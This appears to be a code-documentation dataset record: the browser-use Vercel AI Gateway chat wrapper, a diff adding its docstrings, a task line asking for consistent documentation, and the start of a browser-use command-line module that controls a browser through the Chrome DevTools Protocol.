'anthropic/claude-3.5-haiku',
'anthropic/claude-3.5-sonnet',
'anthropic/claude-3.5-sonnet-20240620',
'anthropic/claude-3.7-sonnet',
'anthropic/claude-haiku-4.5',
'anthropic/claude-opus-4',
'anthropic/claude-opus-4.1',
'anthropic/claude-opus-4.5',
'anthropic/claude-opus-4.6',
'anthropic/claude-sonnet-4',
'anthropic/claude-sonnet-4.5',
'anthropic/claude-sonnet-4.6',
'arcee-ai/trinity-large-preview',
'arcee-ai/trinity-mini',
'bfl/flux-kontext-max',
'bfl/flux-kontext-pro',
'bfl/flux-pro-1.0-fill',
'bfl/flux-pro-1.1',
'bfl/flux-pro-1.1-ultra',
'bytedance/seed-1.6',
'bytedance/seed-1.8',
'bytedance/seedance-v1.0-lite-i2v',
'bytedance/seedance-v1.0-lite-t2v',
'bytedance/seedance-v1.0-pro',
'bytedance/seedance-v1.0-pro-fast',
'bytedance/seedance-v1.5-pro',
'cohere/command-a',
'cohere/embed-v4.0',
'deepseek/deepseek-r1',
'deepseek/deepseek-v3',
'deepseek/deepseek-v3.1',
'deepseek/deepseek-v3.1-terminus',
'deepseek/deepseek-v3.2',
'deepseek/deepseek-v3.2-thinking',
'google/gemini-2.0-flash',
'google/gemini-2.0-flash-lite',
'google/gemini-2.5-flash',
'google/gemini-2.5-flash-image',
'google/gemini-2.5-flash-lite',
'google/gemini-2.5-flash-lite-preview-09-2025',
'google/gemini-2.5-flash-preview-09-2025',
'google/gemini-2.5-pro',
'google/gemini-3-flash',
'google/gemini-3-pro-image',
'google/gemini-3-pro-preview',
'google/gemini-3.1-flash-image-preview',
'google/gemini-3.1-flash-lite-preview',
'google/gemini-3.1-pro-preview',
'google/gemini-embedding-001',
'google/imagen-4.0-fast-generate-001',
'google/imagen-4.0-generate-001',
'google/imagen-4.0-ultra-generate-001',
'google/text-embedding-005',
'google/text-multilingual-embedding-002',
'google/veo-3.0-fast-generate-001',
'google/veo-3.0-generate-001',
'google/veo-3.1-fast-generate-001',
'google/veo-3.1-generate-001',
'inception/mercury-2',
'inception/mercury-coder-small',
'klingai/kling-v2.5-turbo-i2v',
'klingai/kling-v2.5-turbo-t2v',
'klingai/kling-v2.6-i2v',
'klingai/kling-v2.6-motion-control',
'klingai/kling-v2.6-t2v',
'klingai/kling-v3.0-i2v',
'klingai/kling-v3.0-t2v',
'kwaipilot/kat-coder-pro-v1',
'meituan/longcat-flash-chat',
'meituan/longcat-flash-thinking',
'meta/llama-3.1-70b',
'meta/llama-3.1-8b',
'meta/llama-3.2-11b',
'meta/llama-3.2-1b',
'meta/llama-3.2-3b',
'meta/llama-3.2-90b',
'meta/llama-3.3-70b',
'meta/llama-4-maverick',
'meta/llama-4-scout',
'minimax/minimax-m2',
'minimax/minimax-m2.1',
'minimax/minimax-m2.1-lightning',
'minimax/minimax-m2.5',
'minimax/minimax-m2.5-highspeed',
'mistral/codestral',
'mistral/codestral-embed',
'mistral/devstral-2',
'mistral/devstral-small',
'mistral/devstral-small-2',
'mistral/magistral-medium',
'mistral/magistral-small',
'mistral/ministral-14b',
'mistral/ministral-3b',
'mistral/ministral-8b',
'mistral/mistral-embed',
'mistral/mistral-large-3',
'mistral/mistral-medium',
'mistral/mistral-nemo',
'mistral/mistral-small',
'mistral/mixtral-8x22b-instruct',
'mistral/pixtral-12b',
'mistral/pixtral-large',
'moonshotai/kimi-k2',
'moonshotai/kimi-k2-0905',
'moonshotai/kimi-k2-thinking',
'moonshotai/kimi-k2-thinking-turbo',
'moonshotai/kimi-k2-turbo',
'moonshotai/kimi-k2.5',
'morph/morph-v3-fast',
'morph/morph-v3-large',
'nvidia/nemotron-3-nano-30b-a3b',
'nvidia/nemotron-nano-12b-v2-vl',
'nvidia/nemotron-nano-9b-v2',
'openai/gpt-3.5-turbo',
'openai/gpt-3.5-turbo-instruct',
'openai/gpt-4-turbo',
'openai/gpt-4.1',
'openai/gpt-4.1-mini',
'openai/gpt-4.1-nano',
'openai/gpt-4o',
'openai/gpt-4o-mini',
'openai/gpt-4o-mini-search-preview',
'openai/gpt-5',
'openai/gpt-5-chat',
'openai/gpt-5-codex',
'openai/gpt-5-mini',
'openai/gpt-5-nano',
'openai/gpt-5-pro',
'openai/gpt-5.1-codex',
'openai/gpt-5.1-codex-max',
'openai/gpt-5.1-codex-mini',
'openai/gpt-5.1-instant',
'openai/gpt-5.1-thinking',
'openai/gpt-5.2',
'openai/gpt-5.2-chat',
'openai/gpt-5.2-codex',
'openai/gpt-5.2-pro',
'openai/gpt-5.3-chat',
'openai/gpt-5.3-codex',
'openai/gpt-5.4',
'openai/gpt-5.4-pro',
'openai/gpt-image-1',
'openai/gpt-image-1-mini',
'openai/gpt-image-1.5',
'openai/gpt-oss-120b',
'openai/gpt-oss-20b',
'openai/gpt-oss-safeguard-20b',
'openai/o1',
'openai/o3',
'openai/o3-deep-research',
'openai/o3-mini',
'openai/o3-pro',
'openai/o4-mini',
'openai/text-embedding-3-large',
'openai/text-embedding-3-small',
'openai/text-embedding-ada-002',
'perplexity/sonar',
'perplexity/sonar-pro',
'perplexity/sonar-reasoning',
'perplexity/sonar-reasoning-pro',
'prime-intellect/intellect-3',
'recraft/recraft-v2',
'recraft/recraft-v3',
'recraft/recraft-v4',
'recraft/recraft-v4-pro',
'stealth/sonoma-dusk-alpha',
'stealth/sonoma-sky-alpha',
'vercel/v0-1.0-md',
'vercel/v0-1.5-md',
'voyage/voyage-3-large',
'voyage/voyage-3.5',
'voyage/voyage-3.5-lite',
'voyage/voyage-4',
'voyage/voyage-4-large',
'voyage/voyage-4-lite',
'voyage/voyage-code-2',
'voyage/voyage-code-3',
'voyage/voyage-finance-2',
'voyage/voyage-law-2',
'xai/grok-2-vision',
'xai/grok-3',
'xai/grok-3-fast',
'xai/grok-3-mini',
'xai/grok-3-mini-fast',
'xai/grok-4',
'xai/grok-4-fast-non-reasoning',
'xai/grok-4-fast-reasoning',
'xai/grok-4.1-fast-non-reasoning',
'xai/grok-4.1-fast-reasoning',
'xai/grok-4.20-multi-agent-beta',
'xai/grok-4.20-non-reasoning-beta',
'xai/grok-4.20-reasoning-beta',
'xai/grok-code-fast-1',
'xai/grok-imagine-image',
'xai/grok-imagine-image-pro',
'xai/grok-imagine-video',
'xiaomi/mimo-v2-flash',
'zai/glm-4.5',
'zai/glm-4.5-air',
'zai/glm-4.5v',
'zai/glm-4.6',
'zai/glm-4.6v',
'zai/glm-4.6v-flash',
'zai/glm-4.7',
'zai/glm-4.7-flashx',
'zai/glm-5',
]
@dataclass
class ChatVercel(BaseChatModel):
# Model configuration
model: ChatVercelModel | str
# Model params
temperature: float | None = None
max_tokens: int | None = None
top_p: float | None = None
reasoning_models: list[str] | None = field(
default_factory=lambda: [
'o1',
'o3',
'o4',
'gpt-oss',
'gpt-5.2-pro',
'gpt-5.4-pro',
'deepseek-r1',
'-thinking',
'perplexity/sonar-reasoning',
]
)
# Client initialization parameters
api_key: str | None = None
base_url: str | httpx.URL = 'https://ai-gateway.vercel.sh/v1'
timeout: float | httpx.Timeout | None = None
max_retries: int = 5
default_headers: Mapping[str, str] | None = None
default_query: Mapping[str, object] | None = None
http_client: httpx.AsyncClient | None = None
_strict_response_validation: bool = False
provider_options: dict[str, Any] | None = None
reasoning: dict[str, dict[str, Any]] | None = None
model_fallbacks: list[str] | None = None
caching: Literal['auto'] | None = None
# Static
@property
def provider(self) -> str:
return 'vercel'
def _get_client_params(self) -> dict[str, Any]:
api_key = self.api_key or os.getenv('AI_GATEWAY_API_KEY') or os.getenv('VERCEL_OIDC_TOKEN')
base_params = {
'api_key': api_key,
'base_url': self.base_url,
'timeout': self.timeout,
'max_retries': self.max_retries,
'default_headers': self.default_headers,
'default_query': self.default_query,
'_strict_response_validation': self._strict_response_validation,
}
client_params = {k: v for k, v in base_params.items() if v is not None}
if self.http_client is not None:
client_params['http_client'] = self.http_client
return client_params
def get_client(self) -> AsyncOpenAI:
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
return self._client
@property
def name(self) -> str:
return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
if response.usage is None:
return None
prompt_details = getattr(response.usage, 'prompt_tokens_details', None)
cached_tokens = prompt_details.cached_tokens if prompt_details else None
return ChatInvokeUsage(
prompt_tokens=response.usage.prompt_tokens,
prompt_cached_tokens=cached_tokens,
prompt_cache_creation_tokens=None,
prompt_image_tokens=None,
completion_tokens=response.usage.completion_tokens,
total_tokens=response.usage.total_tokens,
)
def _fix_gemini_schema(self, schema: dict[str, Any]) -> dict[str, Any]:
# Handle $defs and $ref resolution
if '$defs' in schema:
defs = schema.pop('$defs')
def resolve_refs(obj: Any) -> Any:
if isinstance(obj, dict):
if '$ref' in obj:
ref = obj.pop('$ref')
ref_name = ref.split('/')[-1]
if ref_name in defs:
# Replace the reference with the actual definition
resolved = defs[ref_name].copy()
# Merge any additional properties from the reference
for key, value in obj.items():
if key != '$ref':
resolved[key] = value
return resolve_refs(resolved)
return obj
else:
# Recursively process all dictionary values
return {k: resolve_refs(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [resolve_refs(item) for item in obj]
return obj
schema = resolve_refs(schema)
# Remove unsupported properties
def clean_schema(obj: Any) -> Any:
if isinstance(obj, dict):
# Remove unsupported properties
cleaned = {}
for key, value in obj.items():
if key not in ['additionalProperties', 'title', 'default']:
cleaned_value = clean_schema(value)
# Handle empty object properties - Gemini doesn't allow empty OBJECT types
if (
key == 'properties'
and isinstance(cleaned_value, dict)
and len(cleaned_value) == 0
and isinstance(obj.get('type', ''), str)
and obj.get('type', '').upper() == 'OBJECT'
):
# Convert empty object to have at least one property
cleaned['properties'] = {'_placeholder': {'type': 'string'}}
else:
cleaned[key] = cleaned_value
# If this is an object type with empty properties, add a placeholder
if (
isinstance(cleaned.get('type', ''), str)
and cleaned.get('type', '').upper() == 'OBJECT'
and 'properties' in cleaned
and isinstance(cleaned['properties'], dict)
and len(cleaned['properties']) == 0
):
cleaned['properties'] = {'_placeholder': {'type': 'string'}}
# Also remove 'title' from the required list if it exists
if 'required' in cleaned and isinstance(cleaned.get('required'), list):
cleaned['required'] = [p for p in cleaned['required'] if p != 'title']
return cleaned
elif isinstance(obj, list):
return [clean_schema(item) for item in obj]
return obj
return clean_schema(schema)
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
vercel_messages = VercelMessageSerializer.serialize_messages(messages)
try:
model_params: dict[str, Any] = {}
if self.temperature is not None:
model_params['temperature'] = self.temperature
if self.max_tokens is not None:
model_params['max_tokens'] = self.max_tokens
if self.top_p is not None:
model_params['top_p'] = self.top_p
extra_body: dict[str, Any] = {}
provider_opts: dict[str, Any] = {}
if self.provider_options:
provider_opts.update(self.provider_options)
if self.reasoning:
# Merge provider-specific reasoning options (ex: {'anthropic': {'thinking': ...}})
for provider_name, opts in self.reasoning.items():
existing = provider_opts.get(provider_name, {})
existing.update(opts)
provider_opts[provider_name] = existing
gateway_opts: dict[str, Any] = provider_opts.get('gateway', {})
if self.model_fallbacks:
gateway_opts['models'] = self.model_fallbacks
if self.caching:
gateway_opts['caching'] = self.caching
if gateway_opts:
provider_opts['gateway'] = gateway_opts
if provider_opts:
extra_body['providerOptions'] = provider_opts
if extra_body:
model_params['extra_body'] = extra_body
if output_format is None:
# Return string response
response = await self.get_client().chat.completions.create(
model=self.model,
messages=vercel_messages,
**model_params,
)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=response.choices[0].message.content or '',
usage=usage,
stop_reason=response.choices[0].finish_reason if response.choices else None,
)
else:
is_google_model = self.model.startswith('google/')
is_anthropic_model = self.model.startswith('anthropic/')
is_reasoning_model = self.reasoning_models and any(
str(pattern).lower() in str(self.model).lower() for pattern in self.reasoning_models
)
if is_google_model or is_anthropic_model or is_reasoning_model:
modified_messages = [m.model_copy(deep=True) for m in messages]
schema = SchemaOptimizer.create_gemini_optimized_schema(output_format)
json_instruction = f'\n\nIMPORTANT: You must respond with ONLY a valid JSON object (no markdown, no code blocks, no explanations) that exactly matches this schema:\n{json.dumps(schema, indent=2)}'
instruction_added = False
if modified_messages and modified_messages[0].role == 'system':
if isinstance(modified_messages[0].content, str):
modified_messages[0].content += json_instruction
instruction_added = True
elif isinstance(modified_messages[0].content, list):
modified_messages[0].content.append(ContentPartTextParam(text=json_instruction))
instruction_added = True
elif modified_messages and modified_messages[-1].role == 'user':
if isinstance(modified_messages[-1].content, str):
modified_messages[-1].content += json_instruction
instruction_added = True
elif isinstance(modified_messages[-1].content, list):
modified_messages[-1].content.append(ContentPartTextParam(text=json_instruction))
instruction_added = True
if not instruction_added:
modified_messages.insert(0, SystemMessage(content=json_instruction))
vercel_messages = VercelMessageSerializer.serialize_messages(modified_messages)
response = await self.get_client().chat.completions.create(
model=self.model,
messages=vercel_messages,
**model_params,
)
content = response.choices[0].message.content if response.choices else None
if not content:
raise ModelProviderError(
message='No response from model',
status_code=500,
model=self.name,
)
try:
text = content.strip()
if text.startswith('```json') and text.endswith('```'):
text = text[7:-3].strip()
elif text.startswith('```') and text.endswith('```'):
text = text[3:-3].strip()
parsed_data = json.loads(text)
parsed = output_format.model_validate(parsed_data)
usage = self._get_usage(response)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
stop_reason=response.choices[0].finish_reason if response.choices else None,
)
except (json.JSONDecodeError, ValueError) as e:
raise ModelProviderError(
message=f'Failed to parse JSON response: {str(e)}. Raw response: {content[:200]}',
status_code=500,
model=self.name,
) from e
else:
schema = SchemaOptimizer.create_optimized_json_schema(output_format)
response_format_schema: JSONSchema = {
'name': 'agent_output',
'strict': True,
'schema': schema,
}
response = await self.get_client().chat.completions.create(
model=self.model,
messages=vercel_messages,
response_format=ResponseFormatJSONSchema(
json_schema=response_format_schema,
type='json_schema',
),
**model_params,
)
content = response.choices[0].message.content if response.choices else None
if not content:
raise ModelProviderError(
message='Failed to parse structured output from model response - empty or null content',
status_code=500,
model=self.name,
)
usage = self._get_usage(response)
parsed = output_format.model_validate_json(content)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
stop_reason=response.choices[0].finish_reason if response.choices else None,
)
except RateLimitError as e:
raise ModelRateLimitError(message=e.message, model=self.name) from e
except APIConnectionError as e:
raise ModelProviderError(message=str(e), model=self.name) from e
except APIStatusError as e:
raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -268,6 +268,41 @@
@dataclass
class ChatVercel(BaseChatModel):
+ """
+ A wrapper around Vercel AI Gateway's API, which provides OpenAI-compatible access
+ to various LLM models with features like rate limiting, caching, and monitoring.
+
+ Examples:
+ ```python
+ from browser_use import Agent, ChatVercel
+
+ llm = ChatVercel(model='openai/gpt-4o', api_key='your_vercel_api_key')
+
+ agent = Agent(task='Your task here', llm=llm)
+ ```
+
+ Args:
+ model: The model identifier
+ api_key: Your Vercel AI Gateway API key. If not provided, falls back to
+ AI_GATEWAY_API_KEY or VERCEL_OIDC_TOKEN environment variables.
+ base_url: The Vercel AI Gateway endpoint (defaults to https://ai-gateway.vercel.sh/v1)
+ temperature: Sampling temperature (0-2)
+ max_tokens: Maximum tokens to generate
+ reasoning_models: List of reasoning model patterns (e.g., 'o1', 'gpt-oss') that need
+ prompt-based JSON extraction. Auto-detects common reasoning models by default.
+ timeout: Request timeout in seconds
+ max_retries: Maximum number of retries for failed requests
+ provider_options: Provider routing options for the gateway. Use this to control which
+ providers are used and in what order. Example: {'gateway': {'order': ['vertex', 'anthropic']}}
+ reasoning: Optional provider-specific reasoning configuration. Merged into
+ providerOptions under the appropriate provider key. Example for Anthropic:
+ {'anthropic': {'thinking': {'type': 'adaptive'}}}. Example for OpenAI:
+ {'openai': {'reasoningEffort': 'high', 'reasoningSummary': 'detailed'}}.
+ model_fallbacks: Optional list of fallback model IDs tried in order if the primary
+ model fails. Passed as providerOptions.gateway.models.
+ caching: Optional caching mode for the gateway. Currently supports 'auto', which
+ enables provider-specific prompt caching via providerOptions.gateway.caching.
+ """
# Model configuration
model: ChatVercelModel | str
@@ -310,6 +345,7 @@ return 'vercel'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
api_key = self.api_key or os.getenv('AI_GATEWAY_API_KEY') or os.getenv('VERCEL_OIDC_TOKEN')
base_params = {
@@ -330,6 +366,12 @@ return client_params
def get_client(self) -> AsyncOpenAI:
+ """
+ Returns an AsyncOpenAI client configured for Vercel AI Gateway.
+
+ Returns:
+ AsyncOpenAI: An instance of the AsyncOpenAI client with Vercel base URL.
+ """
if not hasattr(self, '_client'):
client_params = self._get_client_params()
self._client = AsyncOpenAI(**client_params)
@@ -340,6 +382,7 @@ return str(self.model)
def _get_usage(self, response: ChatCompletion) -> ChatInvokeUsage | None:
+ """Extract usage information from the Vercel response."""
if response.usage is None:
return None
@@ -356,6 +399,12 @@ )
def _fix_gemini_schema(self, schema: dict[str, Any]) -> dict[str, Any]:
+ """
+ Convert a Pydantic model to a Gemini-compatible schema.
+
+ This function removes unsupported properties like 'additionalProperties' and resolves
+ $ref references that Gemini doesn't support.
+ """
# Handle $defs and $ref resolution
if '$defs' in schema:
@@ -437,6 +486,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the model with the given messages through Vercel AI Gateway.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
vercel_messages = VercelMessageSerializer.serialize_messages(messages)
try:
@@ -613,4 +672,4 @@ raise ModelProviderError(message=e.message, status_code=e.status_code, model=self.name) from e
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/vercel/chat.py |
Generate consistent documentation across files |
import asyncio
import base64
import json
import sys
import tempfile
from contextlib import asynccontextmanager
from dataclasses import dataclass
from pathlib import Path
from typing import TYPE_CHECKING, Any
if TYPE_CHECKING:
from cdp_use import CDPClient
from browser_use.browser.session import BrowserSession
STATE_FILE = Path(tempfile.gettempdir()) / 'browser-use-direct.json'
# ---------------------------------------------------------------------------
# State persistence
# ---------------------------------------------------------------------------
def _load_state() -> dict[str, Any]:
if STATE_FILE.exists():
try:
return json.loads(STATE_FILE.read_text())
except (json.JSONDecodeError, OSError):
pass
return {}
def _save_state(state: dict[str, Any]) -> None:
STATE_FILE.write_text(json.dumps(state))
def _clear_state() -> None:
STATE_FILE.unlink(missing_ok=True)
# ---------------------------------------------------------------------------
# Selector map cache (persisted in state file under "selector_map" key)
# ---------------------------------------------------------------------------
def _save_selector_cache(selector_map: dict[int, Any]) -> None:
cache: dict[str, dict[str, Any]] = {}
for idx, node in selector_map.items():
pos = getattr(node, 'absolute_position', None)
if pos is None:
continue
text = ''
if hasattr(node, 'ax_node') and node.ax_node and node.ax_node.name:
text = node.ax_node.name
elif hasattr(node, 'node_value') and node.node_value:
text = node.node_value
tag = getattr(node, 'node_name', '') or ''
cache[str(idx)] = {
'x': pos.x,
'y': pos.y,
'w': pos.width,
'h': pos.height,
'tag': tag.lower(),
'text': text[:80],
}
state = _load_state()
state['selector_map'] = cache
_save_state(state)
def _load_selector_cache() -> dict[int, dict[str, Any]]:
state = _load_state()
raw = state.get('selector_map', {})
return {int(k): v for k, v in raw.items()}
# ---------------------------------------------------------------------------
# Tier 1: Lightweight CDP connection (~200ms)
# ---------------------------------------------------------------------------
@dataclass
class LightCDP:
client: 'CDPClient'
session_id: str
target_id: str
@asynccontextmanager
async def _lightweight_cdp():
from cdp_use import CDPClient
state = _load_state()
cdp_url = state.get('cdp_url')
if not cdp_url:
raise RuntimeError('No active browser session')
client = CDPClient(cdp_url)
try:
await client.start()
except Exception as e:
raise RuntimeError(f'Cannot connect to browser at {cdp_url}: {e}') from e
target_id = state.get('target_id')
# If no saved target, discover one
if not target_id:
targets = await client.send.Target.getTargets()
for t in targets.get('targetInfos', []):
if t.get('type') == 'page' and t.get('url', '').startswith(('http://', 'https://')):
target_id = t['targetId']
break
if not target_id:
await client.stop()
raise RuntimeError('No page target found in browser')
# Attach to the target
attach_result = await client.send.Target.attachToTarget(params={'targetId': target_id, 'flatten': True})
session_id = attach_result.get('sessionId')
if not session_id:
await client.stop()
raise RuntimeError(f'Failed to attach to target {target_id}')
# Enable required domains
await client.send.Page.enable(session_id=session_id)
await client.send.Runtime.enable(session_id=session_id)
try:
yield LightCDP(client=client, session_id=session_id, target_id=target_id)
finally:
try:
await client.stop()
except Exception:
pass
# ---------------------------------------------------------------------------
# Tier 2: Full BrowserSession (for state + first-time open)
# ---------------------------------------------------------------------------
async def _activate_content_target(session: 'BrowserSession', saved_target_id: str | None) -> None:
current_url = await session.get_current_page_url()
if current_url and current_url.startswith(('http://', 'https://')):
return
if saved_target_id and session.session_manager:
target = session.session_manager.get_target(saved_target_id)
if target and target.url and target.url.startswith(('http://', 'https://')):
try:
await session.get_or_create_cdp_session(saved_target_id, focus=True)
return
except (ValueError, Exception):
pass
if session._cdp_client_root:
targets_result = await session._cdp_client_root.send.Target.getTargets()
for t in targets_result.get('targetInfos', []):
if t.get('type') == 'page' and t.get('url', '').startswith(('http://', 'https://')):
try:
await session.get_or_create_cdp_session(t['targetId'], focus=True)
return
except (ValueError, Exception):
pass
@asynccontextmanager
async def browser(use_remote: bool = False):
from browser_use.browser.session import BrowserSession
state = _load_state()
cdp_url = state.get('cdp_url')
session = None
if cdp_url:
session = BrowserSession(cdp_url=cdp_url)
try:
await session.start()
await _activate_content_target(session, state.get('target_id'))
except Exception:
_clear_state()
session = None
if session is None:
if use_remote:
session = BrowserSession(use_cloud=True)
else:
session = BrowserSession(headless=False)
await session.start()
assert session.cdp_url is not None
_save_state({'cdp_url': session.cdp_url, 'remote': use_remote})
try:
yield session
finally:
if session.agent_focus_target_id:
current_state = _load_state()
current_state['target_id'] = session.agent_focus_target_id
_save_state(current_state)
if session._cdp_client_root:
try:
await session._cdp_client_root.stop()
except Exception:
pass
await session.event_bus.stop(clear=True, timeout=2)
# ---------------------------------------------------------------------------
# Lightweight CDP command functions (Tier 1)
# ---------------------------------------------------------------------------
async def _cdp_navigate(cdp: LightCDP, url: str) -> None:
await cdp.client.send.Page.navigate(params={'url': url}, session_id=cdp.session_id)
# Invalidate selector cache — page changed, elements are gone
state = _load_state()
state.pop('selector_map', None)
_save_state(state)
async def _cdp_screenshot(cdp: LightCDP, path: str | None) -> None:
result = await cdp.client.send.Page.captureScreenshot(params={'format': 'png'}, session_id=cdp.session_id)
data = base64.b64decode(result['data'])
if path:
p = Path(path)
p.write_bytes(data) # noqa: ASYNC240
print(f'Screenshot saved to {p} ({len(data)} bytes)')
else:
# Get viewport dimensions
metrics = await cdp.client.send.Page.getLayoutMetrics(session_id=cdp.session_id)
visual = metrics.get('visualViewport', {})
output: dict[str, Any] = {
'screenshot': result['data'],
'size_bytes': len(data),
}
if visual:
output['viewport'] = {
'width': int(visual.get('clientWidth', 0)),
'height': int(visual.get('clientHeight', 0)),
}
print(json.dumps(output))
async def _cdp_click_coordinate(cdp: LightCDP, x: int, y: int) -> None:
sid = cdp.session_id
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mouseMoved', 'x': x, 'y': y},
session_id=sid,
)
await asyncio.sleep(0.05)
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mousePressed', 'x': x, 'y': y, 'button': 'left', 'clickCount': 1},
session_id=sid,
)
await asyncio.sleep(0.05)
await cdp.client.send.Input.dispatchMouseEvent(
params={'type': 'mouseReleased', 'x': x, 'y': y, 'button': 'left', 'clickCount': 1},
session_id=sid,
)
async def _get_scroll_offset(cdp: LightCDP) -> tuple[float, float]:
result = await cdp.client.send.Runtime.evaluate(
params={
'expression': 'JSON.stringify({x:window.scrollX,y:window.scrollY})',
'returnByValue': True,
},
session_id=cdp.session_id,
)
data = json.loads(result.get('result', {}).get('value', '{"x":0,"y":0}'))
return (data['x'], data['y'])
async def _cdp_click_index(cdp: LightCDP, index: int) -> None:
cache = _load_selector_cache()
if index not in cache:
print(f'Error: Element index {index} not in cache. Run "state" first.', file=sys.stderr)
sys.exit(1)
elem = cache[index]
scroll_x, scroll_y = await _get_scroll_offset(cdp)
# Center of element in document coords, converted to viewport coords
viewport_x = int(elem['x'] + elem['w'] / 2 - scroll_x)
viewport_y = int(elem['y'] + elem['h'] / 2 - scroll_y)
await _cdp_click_coordinate(cdp, viewport_x, viewport_y)
tag = elem.get('tag', '')
text = elem.get('text', '')
label = f'{tag}' + (f' "{text}"' if text else '')
print(f'Clicked element [{index}] {label} at ({viewport_x}, {viewport_y})')
async def _cdp_type(cdp: LightCDP, text: str) -> None:
await cdp.client.send.Input.insertText(params={'text': text}, session_id=cdp.session_id)
async def _cdp_input(cdp: LightCDP, index: int, text: str) -> None:
await _cdp_click_index(cdp, index)
await asyncio.sleep(0.1)
await _cdp_type(cdp, text)
print(f'Typed "{text}" into element [{index}]')
async def _cdp_scroll(cdp: LightCDP, direction: str) -> None:
amount = -500 if direction == 'up' else 500
await cdp.client.send.Runtime.evaluate(
params={
'expression': f'window.scrollBy(0, {amount})',
'returnByValue': True,
},
session_id=cdp.session_id,
)
async def _cdp_back(cdp: LightCDP) -> None:
nav = await cdp.client.send.Page.getNavigationHistory(session_id=cdp.session_id)
current_index = nav.get('currentIndex', 0)
entries = nav.get('entries', [])
if current_index > 0:
prev_entry = entries[current_index - 1]
await cdp.client.send.Page.navigateToHistoryEntry(params={'entryId': prev_entry['id']}, session_id=cdp.session_id)
# Invalidate selector cache on navigation
state = _load_state()
state.pop('selector_map', None)
_save_state(state)
else:
print('Already at the beginning of history', file=sys.stderr)
async def _cdp_keys(cdp: LightCDP, keys_str: str) -> None:
from browser_use.actor.utils import get_key_info
# Key alias normalization (same as default_action_watchdog)
key_aliases = {
'ctrl': 'Control',
'control': 'Control',
'alt': 'Alt',
'option': 'Alt',
'meta': 'Meta',
'cmd': 'Meta',
'command': 'Meta',
'shift': 'Shift',
'enter': 'Enter',
'return': 'Enter',
'tab': 'Tab',
'delete': 'Delete',
'backspace': 'Backspace',
'escape': 'Escape',
'esc': 'Escape',
'space': ' ',
'up': 'ArrowUp',
'down': 'ArrowDown',
'left': 'ArrowLeft',
'right': 'ArrowRight',
'pageup': 'PageUp',
'pagedown': 'PageDown',
'home': 'Home',
'end': 'End',
}
sid = cdp.session_id
async def dispatch_key(event_type: str, key: str, modifiers: int = 0) -> None:
from cdp_use.cdp.input.commands import DispatchKeyEventParameters
code, vk_code = get_key_info(key)
params: DispatchKeyEventParameters = {'type': event_type, 'key': key, 'code': code}
if modifiers:
params['modifiers'] = modifiers
if vk_code is not None:
params['windowsVirtualKeyCode'] = vk_code
await cdp.client.send.Input.dispatchKeyEvent(params=params, session_id=sid)
# Normalize
if '+' in keys_str:
parts = [key_aliases.get(p.strip().lower(), p.strip()) for p in keys_str.split('+')]
modifiers_list = parts[:-1]
main_key = parts[-1]
modifier_map = {'Alt': 1, 'Control': 2, 'Meta': 4, 'Shift': 8}
modifier_value = 0
for mod in modifiers_list:
modifier_value |= modifier_map.get(mod, 0)
for mod in modifiers_list:
await dispatch_key('keyDown', mod)
await dispatch_key('keyDown', main_key, modifier_value)
await dispatch_key('keyUp', main_key, modifier_value)
for mod in reversed(modifiers_list):
await dispatch_key('keyUp', mod)
else:
normalized = key_aliases.get(keys_str.strip().lower(), keys_str)
special_keys = {
'Enter',
'Tab',
'Delete',
'Backspace',
'Escape',
'ArrowUp',
'ArrowDown',
'ArrowLeft',
'ArrowRight',
'PageUp',
'PageDown',
'Home',
'End',
'Control',
'Alt',
'Meta',
'Shift',
'F1',
'F2',
'F3',
'F4',
'F5',
'F6',
'F7',
'F8',
'F9',
'F10',
'F11',
'F12',
}
if normalized in special_keys:
await dispatch_key('keyDown', normalized)
if normalized == 'Enter':
await cdp.client.send.Input.dispatchKeyEvent(
params={'type': 'char', 'text': '\r', 'key': 'Enter'},
session_id=sid,
)
await dispatch_key('keyUp', normalized)
else:
# Plain text — use insertText for each character
for char in normalized:
await cdp.client.send.Input.insertText(
params={'text': char},
session_id=sid,
)
async def _cdp_html(cdp: LightCDP, selector: str | None) -> None:
if selector:
js = f'(function(){{ const el = document.querySelector({json.dumps(selector)}); return el ? el.outerHTML : null; }})()'
else:
js = 'document.documentElement.outerHTML'
result = await cdp.client.send.Runtime.evaluate(params={'expression': js, 'returnByValue': True}, session_id=cdp.session_id)
html = result.get('result', {}).get('value')
if html:
print(html)
else:
msg = f'No element found for selector: {selector}' if selector else 'Error: Could not get HTML'
print(msg, file=sys.stderr)
sys.exit(1)
async def _cdp_eval(cdp: LightCDP, js: str) -> None:
result = await cdp.client.send.Runtime.evaluate(params={'expression': js, 'returnByValue': True}, session_id=cdp.session_id)
value = result.get('result', {}).get('value')
print(json.dumps(value) if value is not None else 'undefined')
# ---------------------------------------------------------------------------
# Command routing
# ---------------------------------------------------------------------------
# Commands that always use lightweight CDP (Tier 1)
_LIGHTWEIGHT_COMMANDS = frozenset(
{
'screenshot',
'click',
'type',
'input',
'scroll',
'back',
'keys',
'html',
'eval',
}
)
async def main() -> int:
args = sys.argv[1:]
